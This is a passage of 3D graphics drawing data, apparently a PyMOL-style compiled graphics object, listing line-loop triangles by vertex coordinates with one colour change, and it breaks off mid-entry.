BEGIN, LINE_LOOP,
VERTEX, 20.168, 24.737, 27.682,
VERTEX, 19.988, 24.921, 27.651,
VERTEX, 20.646, 25.152, 27.466,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.988, 24.921, 27.651,
VERTEX, 20.646, 25.152, 27.466,
VERTEX, 20.469, 25.328, 27.427,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.646, 25.152, 27.466,
VERTEX, 20.469, 25.328, 27.427,
VERTEX, 21.262, 25.622, 26.973,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.469, 25.328, 27.427,
VERTEX, 21.262, 25.622, 26.973,
VERTEX, 21.082, 25.789, 26.922,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.262, 25.622, 26.973,
VERTEX, 21.082, 25.789, 26.922,
VERTEX, 21.655, 25.872, 26.491,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.082, 25.789, 26.922,
VERTEX, 21.655, 25.872, 26.491,
VERTEX, 21.468, 26.034, 26.433,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.655, 25.872, 26.491,
VERTEX, 21.468, 26.034, 26.433,
VERTEX, 21.594, 25.754, 26.304,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.468, 26.034, 26.433,
VERTEX, 21.594, 25.754, 26.304,
VERTEX, 21.401, 25.919, 26.246,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.594, 25.754, 26.304,
VERTEX, 21.401, 25.919, 26.246,
VERTEX, 21.116, 25.339, 26.519,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.401, 25.919, 26.246,
VERTEX, 21.116, 25.339, 26.519,
VERTEX, 20.920, 25.511, 26.470,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.116, 25.339, 26.519,
VERTEX, 20.920, 25.511, 26.470,
VERTEX, 20.500, 24.869, 27.012,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.920, 25.511, 26.470,
VERTEX, 20.500, 24.869, 27.012,
VERTEX, 20.306, 25.050, 26.975,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.500, 24.869, 27.012,
VERTEX, 20.306, 25.050, 26.975,
VERTEX, 20.107, 24.619, 27.494,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.306, 25.050, 26.975,
VERTEX, 20.107, 24.619, 27.494,
VERTEX, 19.920, 24.806, 27.465,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.107, 24.619, 27.494,
VERTEX, 19.920, 24.806, 27.465,
VERTEX, 20.168, 24.737, 27.682,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.920, 24.806, 27.465,
VERTEX, 20.168, 24.737, 27.682,
VERTEX, 19.988, 24.921, 27.651,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.988, 24.921, 27.651,
VERTEX, 19.825, 25.090, 27.631,
VERTEX, 20.469, 25.328, 27.427,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.825, 25.090, 27.631,
VERTEX, 20.469, 25.328, 27.427,
VERTEX, 20.308, 25.490, 27.397,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.469, 25.328, 27.427,
VERTEX, 20.308, 25.490, 27.397,
VERTEX, 21.082, 25.789, 26.922,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.308, 25.490, 27.397,
VERTEX, 21.082, 25.789, 26.922,
VERTEX, 20.918, 25.943, 26.881,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.082, 25.789, 26.922,
VERTEX, 20.918, 25.943, 26.881,
VERTEX, 21.468, 26.034, 26.433,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.918, 25.943, 26.881,
VERTEX, 21.468, 26.034, 26.433,
VERTEX, 21.298, 26.182, 26.385,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.468, 26.034, 26.433,
VERTEX, 21.298, 26.182, 26.385,
VERTEX, 21.401, 25.919, 26.246,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.298, 26.182, 26.385,
VERTEX, 21.401, 25.919, 26.246,
VERTEX, 21.225, 26.068, 26.199,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.401, 25.919, 26.246,
VERTEX, 21.225, 26.068, 26.199,
VERTEX, 20.920, 25.511, 26.470,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.225, 26.068, 26.199,
VERTEX, 20.920, 25.511, 26.470,
VERTEX, 20.742, 25.668, 26.433,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.920, 25.511, 26.470,
VERTEX, 20.742, 25.668, 26.433,
VERTEX, 20.306, 25.050, 26.975,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.742, 25.668, 26.433,
VERTEX, 20.306, 25.050, 26.975,
VERTEX, 20.132, 25.216, 26.949,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.306, 25.050, 26.975,
VERTEX, 20.132, 25.216, 26.949,
VERTEX, 19.920, 24.806, 27.465,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.132, 25.216, 26.949,
VERTEX, 19.920, 24.806, 27.465,
VERTEX, 19.752, 24.976, 27.446,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.920, 24.806, 27.465,
VERTEX, 19.752, 24.976, 27.446,
VERTEX, 19.988, 24.921, 27.651,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.752, 24.976, 27.446,
VERTEX, 19.988, 24.921, 27.651,
VERTEX, 19.825, 25.090, 27.631,
END,
COLOR, 0.000, 0.773, 1.000,
BEGIN, LINE_LOOP,
VERTEX, 19.825, 25.090, 27.631,
VERTEX, 19.662, 25.260, 27.616,
VERTEX, 20.308, 25.490, 27.397,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.662, 25.260, 27.616,
VERTEX, 20.308, 25.490, 27.397,
VERTEX, 20.145, 25.655, 27.372,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.308, 25.490, 27.397,
VERTEX, 20.145, 25.655, 27.372,
VERTEX, 20.918, 25.943, 26.881,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.145, 25.655, 27.372,
VERTEX, 20.918, 25.943, 26.881,
VERTEX, 20.751, 26.099, 26.844,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.918, 25.943, 26.881,
VERTEX, 20.751, 26.099, 26.844,
VERTEX, 21.298, 26.182, 26.385,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.751, 26.099, 26.844,
VERTEX, 21.298, 26.182, 26.385,
VERTEX, 21.125, 26.332, 26.340,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.298, 26.182, 26.385,
VERTEX, 21.125, 26.332, 26.340,
VERTEX, 21.225, 26.068, 26.199,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.125, 26.332, 26.340,
VERTEX, 21.225, 26.068, 26.199,
VERTEX, 21.049, 26.217, 26.156,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.225, 26.068, 26.199,
VERTEX, 21.049, 26.217, 26.156,
VERTEX, 20.742, 25.668, 26.433,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.049, 26.217, 26.156,
VERTEX, 20.742, 25.668, 26.433,
VERTEX, 20.566, 25.822, 26.400,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.742, 25.668, 26.433,
VERTEX, 20.566, 25.822, 26.400,
VERTEX, 20.132, 25.216, 26.949,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.566, 25.822, 26.400,
VERTEX, 20.132, 25.216, 26.949,
VERTEX, 19.960, 25.379, 26.929,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.132, 25.216, 26.949,
VERTEX, 19.960, 25.379, 26.929,
VERTEX, 19.752, 24.976, 27.446,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.960, 25.379, 26.929,
VERTEX, 19.752, 24.976, 27.446,
VERTEX, 19.586, 25.146, 27.432,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.752, 24.976, 27.446,
VERTEX, 19.586, 25.146, 27.432,
VERTEX, 19.825, 25.090, 27.631,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.586, 25.146, 27.432,
VERTEX, 19.825, 25.090, 27.631,
VERTEX, 19.662, 25.260, 27.616,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.662, 25.260, 27.616,
VERTEX, 19.482, 25.449, 27.600,
VERTEX, 20.145, 25.655, 27.372,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.482, 25.449, 27.600,
VERTEX, 20.145, 25.655, 27.372,
VERTEX, 19.962, 25.839, 27.345,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.145, 25.655, 27.372,
VERTEX, 19.962, 25.839, 27.345,
VERTEX, 20.751, 26.099, 26.844,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.962, 25.839, 27.345,
VERTEX, 20.751, 26.099, 26.844,
VERTEX, 20.563, 26.273, 26.802,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.751, 26.099, 26.844,
VERTEX, 20.563, 26.273, 26.802,
VERTEX, 21.125, 26.332, 26.340,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.563, 26.273, 26.802,
VERTEX, 21.125, 26.332, 26.340,
VERTEX, 20.932, 26.497, 26.291,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.125, 26.332, 26.340,
VERTEX, 20.932, 26.497, 26.291,
VERTEX, 21.049, 26.217, 26.156,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.932, 26.497, 26.291,
VERTEX, 21.049, 26.217, 26.156,
VERTEX, 20.854, 26.380, 26.110,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.049, 26.217, 26.156,
VERTEX, 20.854, 26.380, 26.110,
VERTEX, 20.566, 25.822, 26.400,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.854, 26.380, 26.110,
VERTEX, 20.566, 25.822, 26.400,
VERTEX, 20.374, 25.990, 26.365,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.566, 25.822, 26.400,
VERTEX, 20.374, 25.990, 26.365,
VERTEX, 19.960, 25.379, 26.929,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.374, 25.990, 26.365,
VERTEX, 19.960, 25.379, 26.929,
VERTEX, 19.773, 25.555, 26.908,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.960, 25.379, 26.929,
VERTEX, 19.773, 25.555, 26.908,
VERTEX, 19.586, 25.146, 27.432,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.773, 25.555, 26.908,
VERTEX, 19.586, 25.146, 27.432,
VERTEX, 19.404, 25.331, 27.419,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.586, 25.146, 27.432,
VERTEX, 19.404, 25.331, 27.419,
VERTEX, 19.662, 25.260, 27.616,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.404, 25.331, 27.419,
VERTEX, 19.662, 25.260, 27.616,
VERTEX, 19.482, 25.449, 27.600,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.482, 25.449, 27.600,
VERTEX, 19.268, 25.672, 27.578,
VERTEX, 19.962, 25.839, 27.345,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.268, 25.672, 27.578,
VERTEX, 19.962, 25.839, 27.345,
VERTEX, 19.744, 26.058, 27.309,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.962, 25.839, 27.345,
VERTEX, 19.744, 26.058, 27.309,
VERTEX, 20.563, 26.273, 26.802,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.744, 26.058, 27.309,
VERTEX, 20.563, 26.273, 26.802,
VERTEX, 20.337, 26.481, 26.750,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.563, 26.273, 26.802,
VERTEX, 20.337, 26.481, 26.750,
VERTEX, 20.932, 26.497, 26.291,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.337, 26.481, 26.750,
VERTEX, 20.932, 26.497, 26.291,
VERTEX, 20.700, 26.694, 26.229,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.932, 26.497, 26.291,
VERTEX, 20.700, 26.694, 26.229,
VERTEX, 20.854, 26.380, 26.110,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.700, 26.694, 26.229,
VERTEX, 20.854, 26.380, 26.110,
VERTEX, 20.620, 26.572, 26.052,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.854, 26.380, 26.110,
VERTEX, 20.620, 26.572, 26.052,
VERTEX, 20.374, 25.990, 26.365,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.620, 26.572, 26.052,
VERTEX, 20.374, 25.990, 26.365,
VERTEX, 20.145, 26.186, 26.322,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.374, 25.990, 26.365,
VERTEX, 20.145, 26.186, 26.322,
VERTEX, 19.773, 25.555, 26.908,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.145, 26.186, 26.322,
VERTEX, 19.773, 25.555, 26.908,
VERTEX, 19.551, 25.762, 26.881,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.773, 25.555, 26.908,
VERTEX, 19.551, 25.762, 26.881,
VERTEX, 19.404, 25.331, 27.419,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.551, 25.762, 26.881,
VERTEX, 19.404, 25.331, 27.419,
VERTEX, 19.188, 25.549, 27.401,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.404, 25.331, 27.419,
VERTEX, 19.188, 25.549, 27.401,
VERTEX, 19.482, 25.449, 27.600,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.188, 25.549, 27.401,
VERTEX, 19.482, 25.449, 27.600,
VERTEX, 19.268, 25.672, 27.578,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.268, 25.672, 27.578,
VERTEX, 19.003, 25.945, 27.545,
VERTEX, 19.744, 26.058, 27.309,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.003, 25.945, 27.545,
VERTEX, 19.744, 26.058, 27.309,
VERTEX, 19.472, 26.325, 27.258,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.744, 26.058, 27.309,
VERTEX, 19.472, 26.325, 27.258,
VERTEX, 20.337, 26.481, 26.750,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.472, 26.325, 27.258,
VERTEX, 20.337, 26.481, 26.750,
VERTEX, 20.056, 26.736, 26.680,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.337, 26.481, 26.750,
VERTEX, 20.056, 26.736, 26.680,
VERTEX, 20.700, 26.694, 26.229,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.056, 26.736, 26.680,
VERTEX, 20.700, 26.694, 26.229,
VERTEX, 20.411, 26.936, 26.148,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.700, 26.694, 26.229,
VERTEX, 20.411, 26.936, 26.148,
VERTEX, 20.620, 26.572, 26.052,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.411, 26.936, 26.148,
VERTEX, 20.620, 26.572, 26.052,
VERTEX, 20.330, 26.808, 25.976,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.620, 26.572, 26.052,
VERTEX, 20.330, 26.808, 25.976,
VERTEX, 20.145, 26.186, 26.322,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.330, 26.808, 25.976,
VERTEX, 20.145, 26.186, 26.322,
VERTEX, 19.860, 26.427, 26.263,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.145, 26.186, 26.322,
VERTEX, 19.860, 26.427, 26.263,
VERTEX, 19.551, 25.762, 26.881,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.860, 26.427, 26.263,
VERTEX, 19.551, 25.762, 26.881,
VERTEX, 19.277, 26.016, 26.842,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.551, 25.762, 26.881,
VERTEX, 19.277, 26.016, 26.842,
VERTEX, 19.188, 25.549, 27.401,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.277, 26.016, 26.842,
VERTEX, 19.188, 25.549, 27.401,
VERTEX, 18.922, 25.817, 27.373,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.188, 25.549, 27.401,
VERTEX, 18.922, 25.817, 27.373,
VERTEX, 19.268, 25.672, 27.578,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.922, 25.817, 27.373,
VERTEX, 19.268, 25.672, 27.578,
VERTEX, 19.003, 25.945, 27.545,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.003, 25.945, 27.545,
VERTEX, 18.671, 26.284, 27.496,
VERTEX, 19.472, 26.325, 27.258,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.671, 26.284, 27.496,
VERTEX, 19.472, 26.325, 27.258,
VERTEX, 19.133, 26.657, 27.187,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.472, 26.325, 27.258,
VERTEX, 19.133, 26.657, 27.187,
VERTEX, 20.056, 26.736, 26.680,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.133, 26.657, 27.187,
VERTEX, 20.056, 26.736, 26.680,
VERTEX, 19.703, 27.052, 26.585,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.056, 26.736, 26.680,
VERTEX, 19.703, 27.052, 26.585,
VERTEX, 20.411, 26.936, 26.148,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.703, 27.052, 26.585,
VERTEX, 20.411, 26.936, 26.148,
VERTEX, 20.046, 27.236, 26.041,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.411, 26.936, 26.148,
VERTEX, 20.046, 27.236, 26.041,
VERTEX, 20.330, 26.808, 25.976,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.046, 27.236, 26.041,
VERTEX, 20.330, 26.808, 25.976,
VERTEX, 19.962, 27.103, 25.874,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.330, 26.808, 25.976,
VERTEX, 19.962, 27.103, 25.874,
VERTEX, 19.860, 26.427, 26.263,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.962, 27.103, 25.874,
VERTEX, 19.860, 26.427, 26.263,
VERTEX, 19.500, 26.729, 26.182,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.860, 26.427, 26.263,
VERTEX, 19.500, 26.729, 26.182,
VERTEX, 19.277, 26.016, 26.842,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.500, 26.729, 26.182,
VERTEX, 19.277, 26.016, 26.842,
VERTEX, 18.930, 26.335, 26.785,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.277, 26.016, 26.842,
VERTEX, 18.930, 26.335, 26.785,
VERTEX, 18.922, 25.817, 27.373,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.930, 26.335, 26.785,
VERTEX, 18.922, 25.817, 27.373,
VERTEX, 18.587, 26.150, 27.329,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.922, 25.817, 27.373,
VERTEX, 18.587, 26.150, 27.329,
VERTEX, 19.003, 25.945, 27.545,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.587, 26.150, 27.329,
VERTEX, 19.003, 25.945, 27.545,
VERTEX, 18.671, 26.284, 27.496,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.671, 26.284, 27.496,
VERTEX, 18.339, 26.626, 27.439,
VERTEX, 19.133, 26.657, 27.187,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.339, 26.626, 27.439,
VERTEX, 19.133, 26.657, 27.187,
VERTEX, 18.795, 26.990, 27.111,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.133, 26.657, 27.187,
VERTEX, 18.795, 26.990, 27.111,
VERTEX, 19.703, 27.052, 26.585,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.795, 26.990, 27.111,
VERTEX, 19.703, 27.052, 26.585,
VERTEX, 19.350, 27.369, 26.485,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.703, 27.052, 26.585,
VERTEX, 19.350, 27.369, 26.485,
VERTEX, 20.046, 27.236, 26.041,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.350, 27.369, 26.485,
VERTEX, 20.046, 27.236, 26.041,
VERTEX, 19.681, 27.539, 25.928,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.046, 27.236, 26.041,
VERTEX, 19.681, 27.539, 25.928,
VERTEX, 19.962, 27.103, 25.874,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.681, 27.539, 25.928,
VERTEX, 19.962, 27.103, 25.874,
VERTEX, 19.593, 27.402, 25.767,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.962, 27.103, 25.874,
VERTEX, 19.593, 27.402, 25.767,
VERTEX, 19.500, 26.729, 26.182,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.593, 27.402, 25.767,
VERTEX, 19.500, 26.729, 26.182,
VERTEX, 19.137, 27.037, 26.095,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.500, 26.729, 26.182,
VERTEX, 19.137, 27.037, 26.095,
VERTEX, 18.930, 26.335, 26.785,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.137, 27.037, 26.095,
VERTEX, 18.930, 26.335, 26.785,
VERTEX, 18.581, 26.659, 26.721,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.930, 26.335, 26.785,
VERTEX, 18.581, 26.659, 26.721,
VERTEX, 18.587, 26.150, 27.329,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.581, 26.659, 26.721,
VERTEX, 18.587, 26.150, 27.329,
VERTEX, 18.251, 26.489, 27.278,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.587, 26.150, 27.329,
VERTEX, 18.251, 26.489, 27.278,
VERTEX, 18.671, 26.284, 27.496,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.251, 26.489, 27.278,
VERTEX, 18.671, 26.284, 27.496,
VERTEX, 18.339, 26.626, 27.439,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.339, 26.626, 27.439,
VERTEX, 18.075, 26.907, 27.389,
VERTEX, 18.795, 26.990, 27.111,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.075, 26.907, 27.389,
VERTEX, 18.795, 26.990, 27.111,
VERTEX, 18.525, 27.263, 27.045,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.795, 26.990, 27.111,
VERTEX, 18.525, 27.263, 27.045,
VERTEX, 19.350, 27.369, 26.485,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.525, 27.263, 27.045,
VERTEX, 19.350, 27.369, 26.485,
VERTEX, 19.070, 27.627, 26.401,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.350, 27.369, 26.485,
VERTEX, 19.070, 27.627, 26.401,
VERTEX, 19.681, 27.539, 25.928,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.070, 27.627, 26.401,
VERTEX, 19.681, 27.539, 25.928,
VERTEX, 19.389, 27.786, 25.835,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.681, 27.539, 25.928,
VERTEX, 19.389, 27.786, 25.835,
VERTEX, 19.593, 27.402, 25.767,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.389, 27.786, 25.835,
VERTEX, 19.593, 27.402, 25.767,
VERTEX, 19.297, 27.646, 25.678,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.593, 27.402, 25.767,
VERTEX, 19.297, 27.646, 25.678,
VERTEX, 19.137, 27.037, 26.095,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.297, 27.646, 25.678,
VERTEX, 19.137, 27.037, 26.095,
VERTEX, 18.846, 27.290, 26.022,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.137, 27.037, 26.095,
VERTEX, 18.846, 27.290, 26.022,
VERTEX, 18.581, 26.659, 26.721,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.846, 27.290, 26.022,
VERTEX, 18.581, 26.659, 26.721,
VERTEX, 18.302, 26.926, 26.666,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.581, 26.659, 26.721,
VERTEX, 18.302, 26.926, 26.666,
VERTEX, 18.251, 26.489, 27.278,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.302, 26.926, 26.666,
VERTEX, 18.251, 26.489, 27.278,
VERTEX, 17.982, 26.767, 27.232,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.251, 26.489, 27.278,
VERTEX, 17.982, 26.767, 27.232,
VERTEX, 18.339, 26.626, 27.439,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.982, 26.767, 27.232,
VERTEX, 18.339, 26.626, 27.439,
VERTEX, 18.075, 26.907, 27.389,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.075, 26.907, 27.389,
VERTEX, 17.860, 27.141, 27.345,
VERTEX, 18.525, 27.263, 27.045,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.860, 27.141, 27.345,
VERTEX, 18.525, 27.263, 27.045,
VERTEX, 18.306, 27.490, 26.988,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.525, 27.263, 27.045,
VERTEX, 18.306, 27.490, 26.988,
VERTEX, 19.070, 27.627, 26.401,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.306, 27.490, 26.988,
VERTEX, 19.070, 27.627, 26.401,
VERTEX, 18.841, 27.842, 26.330,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.070, 27.627, 26.401,
VERTEX, 18.841, 27.842, 26.330,
VERTEX, 19.389, 27.786, 25.835,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.841, 27.842, 26.330,
VERTEX, 19.389, 27.786, 25.835,
VERTEX, 19.152, 27.991, 25.756,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.389, 27.786, 25.835,
VERTEX, 19.152, 27.991, 25.756,
VERTEX, 19.297, 27.646, 25.678,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.152, 27.991, 25.756,
VERTEX, 19.297, 27.646, 25.678,
VERTEX, 19.056, 27.849, 25.603,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.297, 27.646, 25.678,
VERTEX, 19.056, 27.849, 25.603,
VERTEX, 18.846, 27.290, 26.022,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.056, 27.849, 25.603,
VERTEX, 18.846, 27.290, 26.022,
VERTEX, 18.610, 27.501, 25.960,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.846, 27.290, 26.022,
VERTEX, 18.610, 27.501, 25.960,
VERTEX, 18.302, 26.926, 26.666,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.610, 27.501, 25.960,
VERTEX, 18.302, 26.926, 26.666,
VERTEX, 18.075, 27.148, 26.618,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.302, 26.926, 26.666,
VERTEX, 18.075, 27.148, 26.618,
VERTEX, 17.982, 26.767, 27.232,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.075, 27.148, 26.618,
VERTEX, 17.982, 26.767, 27.232,
VERTEX, 17.764, 26.999, 27.192,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.982, 26.767, 27.232,
VERTEX, 17.764, 26.999, 27.192,
VERTEX, 18.075, 26.907, 27.389,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.764, 26.999, 27.192,
VERTEX, 18.075, 26.907, 27.389,
VERTEX, 17.860, 27.141, 27.345,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.860, 27.141, 27.345,
VERTEX, 17.678, 27.341, 27.306,
VERTEX, 18.306, 27.490, 26.988,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.678, 27.341, 27.306,
VERTEX, 18.306, 27.490, 26.988,
VERTEX, 18.120, 27.684, 26.939,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.306, 27.490, 26.988,
VERTEX, 18.120, 27.684, 26.939,
VERTEX, 18.841, 27.842, 26.330,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.120, 27.684, 26.939,
VERTEX, 18.841, 27.842, 26.330,
VERTEX, 18.647, 28.026, 26.269,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.841, 27.842, 26.330,
VERTEX, 18.647, 28.026, 26.269,
VERTEX, 19.152, 27.991, 25.756,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.647, 28.026, 26.269,
VERTEX, 19.152, 27.991, 25.756,
VERTEX, 18.950, 28.167, 25.688,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.152, 27.991, 25.756,
VERTEX, 18.950, 28.167, 25.688,
VERTEX, 19.056, 27.849, 25.603,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.950, 28.167, 25.688,
VERTEX, 19.056, 27.849, 25.603,
VERTEX, 18.852, 28.024, 25.538,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.056, 27.849, 25.603,
VERTEX, 18.852, 28.024, 25.538,
VERTEX, 18.610, 27.501, 25.960,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.852, 28.024, 25.538,
VERTEX, 18.610, 27.501, 25.960,
VERTEX, 18.410, 27.681, 25.906,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.610, 27.501, 25.960,
VERTEX, 18.410, 27.681, 25.906,
VERTEX, 18.075, 27.148, 26.618,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.410, 27.681, 25.906,
VERTEX, 18.075, 27.148, 26.618,
VERTEX, 17.883, 27.339, 26.576,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.075, 27.148, 26.618,
VERTEX, 17.883, 27.339, 26.576,
VERTEX, 17.764, 26.999, 27.192,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.883, 27.339, 26.576,
VERTEX, 17.764, 26.999, 27.192,
VERTEX, 17.580, 27.198, 27.156,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.764, 26.999, 27.192,
VERTEX, 17.580, 27.198, 27.156,
VERTEX, 17.860, 27.141, 27.345,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.580, 27.198, 27.156,
VERTEX, 17.860, 27.141, 27.345,
VERTEX, 17.678, 27.341, 27.306,
END,
BEGIN, LINE_LOOP,
